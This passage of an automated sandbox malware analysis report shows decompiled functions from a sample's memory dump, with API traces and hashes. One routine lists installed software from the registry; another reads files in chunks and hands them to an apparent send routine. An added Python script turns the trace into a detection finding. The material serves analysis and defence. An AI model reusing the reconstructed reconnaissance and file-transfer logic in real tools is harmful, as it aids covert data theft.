                    										}
                    										break;
                    									}
                    									_t209 = _t193 + 0x100 + _t216 * 2;
                    									do {
                    										_t216 = _t216 + 1;
                    										 *_t209 = 0x8000;
                    										_t209 = _t209 + 2;
                    									} while (_t216 <= ( *_t189 & 0x000000ff));
                    									goto L30;
                    								}
                    								goto L32;
                    							}
                    						} else {
                    							_t190 =  &_v21;
                    							while(1) {
                    								_t165 =  *_t190;
                    								if(_t165 == 0) {
                    									goto L22;
                    								}
                    								_t192 =  *(_t190 - 1) & 0x000000ff;
                    								_t166 = _t165 & 0x000000ff;
                    								while(_t192 <= _t166) {
                    									 *((char*)(_t192 + _t197)) = 0x20;
                    									_t192 = _t192 + 1;
                    									__eflags = _t192;
                    									_t166 =  *_t190 & 0x000000ff;
                    								}
                    								_t190 =  &(_t190[2]);
                    								_t242 =  *(_t190 - 1) - _t170;
                    								if( *(_t190 - 1) != _t170) {
                    									continue;
                    								}
                    								goto L22;
                    							}
                    							goto L22;
                    						}
                    					}
                    				}
                    				_t168 = E0044B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                    				_t219 = _t218 + 0x14;
                    				if(_t168 != 0) {
                    					goto L36;
                    				}
                    				goto L3;
                    			}

                    Instruction addresses: 0x0043f5b3 to 0x0043f948 (per-statement address column, flattened by extraction)

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: 91b6e8db2eed5a3f9bc18157842a8c22ad8603507a8d278bced299eaa295a49f
                    • Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
                    • Opcode Fuzzy Hash: 91b6e8db2eed5a3f9bc18157842a8c22ad8603507a8d278bced299eaa295a49f
                    • Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E00417C05(void* __ebx, void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				char _v16;
                    				char _v40;
                    				char _v64;
                    				char _v88;
                    				char _v112;
                    				char _v136;
                    				char _v160;
                    				char _v184;
                    				char _v208;
                    				char _v232;
                    				char _v256;
                    				char _v280;
                    				char _v304;
                    				char _v328;
                    				char _v352;
                    				char _v376;
                    				char _v400;
                    				char _v424;
                    				char _v448;
                    				char _v472;
                    				char _v1500;
                    				void* __edi;
                    				long _t72;
                    				long _t78;
                    				long _t206;
                    				void* _t207;
                    				intOrPtr* _t208;
                    
                    				_t129 = __ebx;
                    				_t207 = __ecx;
                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
                    					_v16 = 0x400;
                    					_t206 = 0;
                    					E00401F6D(__ebx,  &_v64);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push( &_v16);
                    					_push( &_v1500);
                    					_push(0);
                    					while(1) {
                    						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
                    						__eflags = _t72 - 0x103;
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _t72;
                    						if(_t72 != 0) {
                    							L8:
                    							_t206 = _t206 + 1;
                    							__eflags = _t206;
                    							_v16 = 0x400;
                    						} else {
                    							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
                    							__eflags = _t78;
                    							if(_t78 == 0) {
                    								E004109BF( &_v40, _v8, L"DisplayName");
                    								 *_t208 = L"Publisher";
                    								E004109BF( &_v184, _v8);
                    								 *_t208 = L"DisplayVersion";
                    								E004109BF( &_v160, _v8);
                    								 *_t208 = L"InstallLocation";
                    								E004109BF( &_v136, _v8);
                    								 *_t208 = L"InstallDate";
                    								E004109BF( &_v112, _v8);
                    								 *_t208 = L"UninstallString";
                    								E004109BF( &_v88, _v8);
                    								__eflags = E00409DB5();
                    								if(__eflags == 0) {
                    									E00403311(E004030A6(_t129,  &_v208, E004030A6(_t129,  &_v232, E00404429(_t129,  &_v256, E004030A6(_t129,  &_v280, E00404429(_t129,  &_v304, E004030A6(_t129,  &_v328, E00404429(_t129,  &_v352, E004030A6(_t129,  &_v376, E00404429(_t129,  &_v400, E004030A6(_t129,  &_v424, E00404429(_t129,  &_v448, E00407514( &_v472,  &_v40, __eflags, 0x4659c4), __eflags,  &_v160), _t206, __eflags, 0x4659c4), __eflags,  &_v112), _t206, __eflags, 0x4659c4), __eflags,  &_v184), _t206, __eflags, 0x4659c4), __eflags,  &_v136), _t206, __eflags, 0x4659c4), __eflags,  &_v88), _t206, __eflags, 0x4659c4), _t206, __eflags, "\n"));
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    								}
                    								RegCloseKey(_v8);
                    								E00401EF0();
                    								E00401EF0();
                    								E00401EF0();
                    								E00401EF0();
                    								E00401EF0();
                    								E00401EF0();
                    								goto L8;
                    							}
                    						}
                    						__eflags = 0;
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push( &_v16);
                    						_push( &_v1500);
                    						_push(_t206);
                    					}
                    					RegCloseKey(_v12);
                    					E0040331A(_t129, _t207, __eflags,  &_v64);
                    					E00401EF0();
                    				} else {
                    					E0040427F(__ebx, _t207, 0x45f724);
                    				}
                    				return _t207;
                    			}

                    Instruction addresses: 0x00417c05 to 0x00417f0f (per-statement address column, flattened by extraction)

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00417C27
                    • RegEnumKeyExA.ADVAPI32 ref: 00417EDB
                    • RegCloseKey.ADVAPI32(?), ref: 00417EEF
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    • API String ID: 1332880857-3714951968
                    • Opcode ID: 05422203580618e1de8e5d36feb4b4030bffa32296bddd461e91946ad577b465
                    • Instruction ID: 4efbb3102b8a917cfe0ff116b1c7685e5740e714d91e440490eee53db017ab4b
                    • Opcode Fuzzy Hash: 05422203580618e1de8e5d36feb4b4030bffa32296bddd461e91946ad577b465
                    • Instruction Fuzzy Hash: 04814F719141189BDB14EB61DD52EEEB379AF50305F1040AFB90AB2192EF386F85CF68
                    Uniqueness

                    Uniqueness Score: -1.00%
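The API trace and String ID attached to E00417C05 above record the sample opening HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall with access mask 0x20019, enumerating its subkeys until RegEnumKeyExA returns 0x103 (the `_t72 - 0x103` check in the loop), and reading DisplayName, Publisher, DisplayVersion, InstallLocation, InstallDate and UninstallString from each entry. The Python below is an added example, not code from the report or from the sample: it parses trace lines in the report's own format, decodes the hive, access mask and stop status from Windows SDK constants, and reduces the sequence to one installed-software-enumeration finding. The three trace lines and the `$`-joined String ID are copied from the report; the constant tables come from winreg.h, winnt.h and winerror.h; the regex and the finding structure are this example's own.

```python
"""Decode the registry API trace that the report attaches to E00417C05.

The three trace lines and the '$'-joined String ID are copied from the report.
The SDK constant tables, the parser and the finding logic are this example's own.
"""
import re
from dataclasses import dataclass

# Copied from the report's "APIs" and "Similarity" blocks for E00417C05.
TRACE = r"""
RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00417C27
RegEnumKeyExA.ADVAPI32 ref: 00417EDB
RegCloseKey.ADVAPI32(?), ref: 00417EEF
"""
STRING_ID = (r"DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$"
             r"Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString")

# Windows SDK constants (winreg.h, winnt.h, winerror.h).
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
NAMED_MASKS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
ACCESS_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
               0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
               0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x10000: "DELETE",
               0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
ERROR_NO_MORE_ITEMS = 0x103  # the decompiled loop breaks when RegEnumKeyExA returns this
UNINSTALL_KEY = r"Software\Microsoft\Windows\CurrentVersion\Uninstall"

# One trace line: Api.Module(arg,arg,...), ref: ADDRESS   (argument list is optional)
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int


def parse_arg(tok):
    """'?' is an argument the sandbox could not resolve; 8 hex digits are a DWORD."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_trace(text):
    calls = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip().lstrip("• "))
        if not m:
            raise ValueError(f"unparsed trace line: {line!r}")
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls


def decode_access(mask):
    """Name a registry access mask: a known composite first, else its bits."""
    if mask in NAMED_MASKS:
        return NAMED_MASKS[mask]
    names = [n for bit, n in ACCESS_BITS.items() if mask & bit]
    rest = mask & ~sum(ACCESS_BITS)
    return "|".join(names) + (f"|0x{rest:x}" if rest else "")


def full_key(call):
    hive, sub = call.args[0], call.args[1]
    return f"{HKEYS.get(hive, f'0x{hive:08x}')}\\{sub}"


def find_uninstall_enumeration(calls, string_id):
    """Report the Open -> Enum -> Close sequence on the Uninstall key, plus the
    per-entry value names recovered from the report's String ID."""
    opens = [c for c in calls if c.api.startswith("RegOpenKeyEx") and len(c.args) > 1
             and isinstance(c.args[1], str) and c.args[1].lower() == UNINSTALL_KEY.lower()]
    if not opens or not any(c.api.startswith("RegEnumKeyEx") for c in calls):
        return None
    o = opens[0]
    return {
        "key": full_key(o),
        "access": decode_access(o.args[3]),
        "opened_at": f"0x{o.ref:08x}",
        "closed": any(c.api == "RegCloseKey" for c in calls),
        "values_read": sorted(s for s in string_id.split("$") if "\\" not in s),
        "stop_status": f"0x{ERROR_NO_MORE_ITEMS:x} ERROR_NO_MORE_ITEMS",
    }


if __name__ == "__main__":
    for k, v in find_uninstall_enumeration(parse_trace(TRACE), STRING_ID).items():
        print(f"{k}: {v}")
```

Run as-is it prints the finding for the three lines above; pointing `parse_trace` at a longer trace block from the same report format gives one finding per Open/Enum pair on the Uninstall key, which is the signal to triage, while the individual RegOpenKeyExA calls with KEY_READ are too common to act on alone.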

                    C-Code - Quality: 100%
                    			E105DA3B4(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t25;
                    				intOrPtr* _t26;
                    				intOrPtr _t28;
                    				intOrPtr* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t45;
                    				intOrPtr* _t46;
                    				intOrPtr* _t47;
                    				intOrPtr* _t55;
                    				intOrPtr* _t70;
                    				intOrPtr _t74;
                    
                    				_t74 = _a4;
                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                    				if(_t25 != 0 && _t25 != 0x46a188) {
                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                    					if(_t45 != 0 &&  *_t45 == 0) {
                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                    						if(_t46 != 0 &&  *_t46 == 0) {
                    							E105D1063(_t46);
                    							E105D95F0( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                    						if(_t47 != 0 &&  *_t47 == 0) {
                    							E105D1063(_t47);
                    							E105D9AAA( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						E105D1063( *((intOrPtr*)(_t74 + 0x7c)));
                    						E105D1063( *((intOrPtr*)(_t74 + 0x88)));
                    					}
                    				}
                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                    				if(_t26 != 0 &&  *_t26 == 0) {
                    					E105D1063( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                    					E105D1063( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                    					E105D1063( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                    					E105D1063( *((intOrPtr*)(_t74 + 0x8c)));
                    				}
                    				E105DA527( *((intOrPtr*)(_t74 + 0x9c)));
                    				_t28 = 6;
                    				_t55 = _t74 + 0xa0;
                    				_v8 = _t28;
                    				_t70 = _t74 + 0x28;
                    				do {
                    					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
                    						_t31 =  *_t70;
                    						if(_t31 != 0 &&  *_t31 == 0) {
                    							E105D1063(_t31);
                    							E105D1063( *_t55);
                    						}
                    						_t28 = _v8;
                    					}
                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                    						if(_t29 != 0 &&  *_t29 == 0) {
                    							E105D1063(_t29);
                    						}
                    						_t28 = _v8;
                    					}
                    					_t55 = _t55 + 4;
                    					_t70 = _t70 + 0x10;
                    					_t28 = _t28 - 1;
                    					_v8 = _t28;
                    				} while (_t28 != 0);
                    				return E105D1063(_t74);
                    			}

                    Instruction addresses: 0x105da3bc to 0x105da4fd (per-statement address column, flattened by extraction)

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 105DA3F8
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D960D
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D961F
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9631
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9643
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9655
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9667
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D9679
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D968B
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D969D
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96AF
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96C1
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96D3
                      • Part of subcall function 105D95F0: _free.LIBCMT ref: 105D96E5
                    • _free.LIBCMT ref: 105DA3ED
                      • Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
                      • Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B
                    • _free.LIBCMT ref: 105DA40F
                    • _free.LIBCMT ref: 105DA424
                    • _free.LIBCMT ref: 105DA42F
                    • _free.LIBCMT ref: 105DA451
                    • _free.LIBCMT ref: 105DA464
                    • _free.LIBCMT ref: 105DA472
                    • _free.LIBCMT ref: 105DA47D
                    • _free.LIBCMT ref: 105DA4B5
                    • _free.LIBCMT ref: 105DA4BC
                    • _free.LIBCMT ref: 105DA4D9
                    • _free.LIBCMT ref: 105DA4F1
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                    • Instruction ID: c529f46f091769caedd01da6a9406b68136f766985f7d1b49f4c9df0a6496d51
                    • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                    • Instruction Fuzzy Hash: 31314D31600741AFEB209A3DE88DB47BBE9EF40290F11841BE459DB350EF75BD808B65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00449546(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t25;
                    				intOrPtr* _t26;
                    				intOrPtr _t28;
                    				intOrPtr* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t45;
                    				intOrPtr* _t46;
                    				intOrPtr* _t47;
                    				intOrPtr* _t55;
                    				intOrPtr* _t70;
                    				intOrPtr _t74;
                    
                    				_t74 = _a4;
                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                    				if(_t25 != 0 && _t25 != 0x46a188) {
                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                    					if(_t45 != 0 &&  *_t45 == 0) {
                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                    						if(_t46 != 0 &&  *_t46 == 0) {
                    							E004401F5(_t46);
                    							E00448782( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                    						if(_t47 != 0 &&  *_t47 == 0) {
                    							E004401F5(_t47);
                    							E00448C3C( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						E004401F5( *((intOrPtr*)(_t74 + 0x7c)));
                    						E004401F5( *((intOrPtr*)(_t74 + 0x88)));
                    					}
                    				}
                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                    				if(_t26 != 0 &&  *_t26 == 0) {
                    					E004401F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                    					E004401F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                    					E004401F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                    					E004401F5( *((intOrPtr*)(_t74 + 0x8c)));
                    				}
                    				E004496B9( *((intOrPtr*)(_t74 + 0x9c)));
                    				_t28 = 6;
                    				_t16 = _t74 + 0xa0; // 0xa0
                    				_t55 = _t16;
                    				_v8 = _t28;
                    				_t18 = _t74 + 0x28; // 0x28
                    				_t70 = _t18;
                    				do {
                    					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
                    						_t31 =  *_t70;
                    						if(_t31 != 0 &&  *_t31 == 0) {
                    							E004401F5(_t31);
                    							E004401F5( *_t55);
                    						}
                    						_t28 = _v8;
                    					}
                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                    						if(_t29 != 0 &&  *_t29 == 0) {
                    							E004401F5(_t29);
                    						}
                    						_t28 = _v8;
                    					}
                    					_t55 = _t55 + 4;
                    					_t70 = _t70 + 0x10;
                    					_t28 = _t28 - 1;
                    					_v8 = _t28;
                    				} while (_t28 != 0);
                    				return E004401F5(_t74);
                    			}

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0044958A
                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448841
                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448853
                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448865
                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448877
                    • _free.LIBCMT ref: 0044957F
                      • Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                    • _free.LIBCMT ref: 004495A1
                    • _free.LIBCMT ref: 004495B6
                    • _free.LIBCMT ref: 004495C1
                    • _free.LIBCMT ref: 004495E3
                    • _free.LIBCMT ref: 004495F6
                    • _free.LIBCMT ref: 00449604
                    • _free.LIBCMT ref: 0044960F
                    • _free.LIBCMT ref: 00449647
                    • _free.LIBCMT ref: 0044964E
                    • _free.LIBCMT ref: 0044966B
                    • _free.LIBCMT ref: 00449683
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                    • Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
                    • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                    • Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E10597310(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                    				void* _v12;
                    				union _LARGE_INTEGER _v16;
                    				struct _OVERLAPPED* _v20;
                    				long _v24;
                    				long _v28;
                    				intOrPtr _v32;
                    				long _v36;
                    				struct _OVERLAPPED* _v40;
                    				union _LARGE_INTEGER* _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				struct %anon52 _v64;
                    				intOrPtr _v68;
                    				struct %anon52 _v80;
                    				union _LARGE_INTEGER _v84;
                    				intOrPtr _v88;
                    				char _v112;
                    				char _v136;
                    				char _v160;
                    				char _v184;
                    				char _v208;
                    				char _v232;
                    				char _v256;
                    				char _v280;
                    				char _v304;
                    				char _v328;
                    				char _v352;
                    				char _v376;
                    				char _v400;
                    				char _v424;
                    				char _v448;
                    				char _v472;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct %anon52 _t118;
                    				void* _t120;
                    				void* _t127;
                    				long _t137;
                    				void* _t138;
                    				signed int _t139;
                    				struct _OVERLAPPED* _t146;
                    				signed int _t149;
                    				void* _t155;
                    				void* _t157;
                    				void* _t158;
                    				void* _t174;
                    				long _t199;
                    				signed int _t204;
                    				void* _t217;
                    				intOrPtr _t282;
                    				union _LARGE_INTEGER* _t296;
                    				void* _t298;
                    				void* _t302;
                    				void* _t303;
                    				void* _t304;
                    				void* _t305;
                    				void* _t306;
                    
                    				_t279 = __edx;
                    				_v68 = __ecx;
                    				E105957F9(__ecx);
                    				_t303 = _t302 - 0x10;
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				_t300 = _v68;
                    				E10595876(__edx);
                    				_v28 = 0x186a0;
                    				_v20 = 0;
                    				_t298 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                    				_t311 = _t298 - 0xffffffff;
                    				if(_t298 != 0xffffffff) {
                    					_v80.LowPart = 0;
                    					_v80.HighPart = 0;
                    					 *0x453268(_t298,  &_v80);
                    					_t204 = _v80.HighPart;
                    					_t118 = _v80;
                    					_v48 = _t204;
                    					_v32 = _t204;
                    					_v52 = _t118;
                    					_v16.LowPart = _t118;
                    					E105950ED(0,  &_v112, _a4);
                    					_t120 = E105A81A9( &_v136,  &_v112);
                    					_t304 = _t303 - 0x18;
                    					E10598430(0, _t304, 0x45f810, _t298, __eflags, _t120);
                    					_t305 = _t304 - 0x14;
                    					E10592EF2(0, _t305, "[Info]");
                    					E105A7AEE(0, _t298);
                    					_t306 = _t305 + 0x30;
                    					E10592E35();
                    					E10592D5E();
                    					_v36 = 1;
                    					_v40 = 0;
                    					_t127 = E105E16EE(_v52, _v48, 0x186a0, 0);
                    					_t211 = 0x45f810;
                    					asm("xorps xmm0, xmm0");
                    					_v88 = _t127 + 1;
                    					asm("adc ecx, ebx");
                    					asm("movlpd [ebp-0x3c], xmm0");
                    					_v84.LowPart = 0x45f810;
                    					__eflags = _v48;
                    					if(__eflags < 0) {
                    						L17:
                    						CloseHandle(_t298);
                    						E10595C79(_t300);
                    						_t199 = 1;
                    					} else {
                    						if(__eflags > 0) {
                    							L5:
                    							_v44 = _v64.HighPart.LowPart;
                    							_v64.HighPart.LowPart = _v64;
                    							_t137 = 0x186a0;
                    							goto L6;
                    							do {
                    								do {
                    									L6:
                    									_t282 = _v32;
                    									__eflags = _v20 - _t282;
                    									if(__eflags >= 0) {
                    										_t211 = _v16.LowPart;
                    										if(__eflags > 0) {
                    											L9:
                    											_t137 = _t211;
                    											_v20 = _t282;
                    											_v28 = _t137;
                    										} else {
                    											__eflags = _t137 - _t211;
                    											if(__eflags > 0) {
                    												goto L9;
                    											}
                    										}
                    									}
                    									_push(_t137);
                    									_t138 = E105C0334(_t211, _t282, _t300, __eflags);
                    									_push(0);
                    									_v12 = _t138;
                    									_v24 = 0;
                    									_t139 = SetFilePointerEx(_t298, _v64.HighPart.LowPart, _v44, 0);
                    									__eflags = _t139;
                    									if(_t139 == 0) {
                    										_t307 = _t306 - 0x18;
                    										_t217 = _t306 - 0x18;
                    										_push(0x45f838);
                    										goto L23;
                    									} else {
                    										_t149 = ReadFile(_t298, _v12, _v28,  &_v24, 0);
                    										__eflags = _t149;
                    										if(_t149 == 0) {
                    											_t307 = _t306 - 0x18;
                    											_t217 = _t306 - 0x18;
                    											_push(0x45f850);
                    											L23:
                    											E10592EF2(0, _t217);
                    											E10592EF2(0, _t307 - 0x18, 0x45f4f8);
                    											E105A7AEE(0, _t298);
                    											E105C033D(_v12);
                    											CloseHandle(_t298);
                    											goto L24;
                    										} else {
                    											__eflags = _v24;
                    											if(__eflags == 0) {
                    												E105C033D(_v12);
                    												CloseHandle(_t298);
                    												E10595C79(_t300);
                    												_t146 = 1;
                    												goto L25;
                    											} else {
                    												E105950ED(0,  &_v112, _a4);
                    												_t155 = E10592F19(0,  &_v472, _t282, __eflags, _v12, _v24);
                    												_t306 = _t306 - 0x18;
                    												_t157 = E105A80CE(0x46c238,  &_v448, _v88, _v84);
                    												_t158 = E105A80CE(0x46c238,  &_v424, _v36, _v40);
                    												E10593D8B(_t306, E10593E01(0x46c238,  &_v136, E10593E01(0x46c238,  &_v160, E10593E01(0x46c238,  &_v184, E10593D8B( &_v208, E10593E01(0x46c238,  &_v232, E10593D8B( &_v256, E10593E01(0x46c238,  &_v280, E10593E01(0x46c238,  &_v304, E10593E01(0x46c238,  &_v328, E10593E01(0x46c238,  &_v352, E10593E01(0x46c238,  &_v376, E105A820A(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t158), __eflags, 0x46c238), _t157), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t155);
                    												_t300 = _v68;
                    												_push(0x52);
                    												_t174 = E10595912(0x46c238, _v68, _t172, __eflags);
                    												__eflags = _t174 - 0xffffffff;
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592E35();
                    												E10592D5E();
                    												__eflags = 0x46c200 | _t174 == 0xffffffff;
                    												if((0x46c200 | _t174 == 0xffffffff) != 0) {
                    													E10595C79(_t300);
                    													CloseHandle(_t298);
                    													E105C033D(_v12);
                    													_t199 = 0;
                    												} else {
                    													goto L14;
                    												}
                    											}
                    										}
                    									}
                    									goto L18;
                    									L14:
                    									E105C033D(_v12);
                    									_t137 = _v28;
                    									_v16.LowPart = _v16 - _t137;
                    									_t296 = _v44;
                    									asm("sbb ecx, [ebp-0x10]");
                    									_v36 = _v36 + 1;
                    									_push(0);
                    									_pop(0);
                    									asm("adc [ebp-0x24], ebx");
                    									_t211 = _v64.HighPart.LowPart + _t137;
                    									_v64.HighPart = _t211;
                    									asm("adc edx, [ebp-0x10]");
                    									_v44 = _t296;
                    									__eflags = _t296 - _v48;
                    								} while (__eflags < 0);
                    								if(__eflags > 0) {
                    									goto L17;
                    								} else {
                    									goto L16;
                    								}
                    								goto L18;
                    								L16:
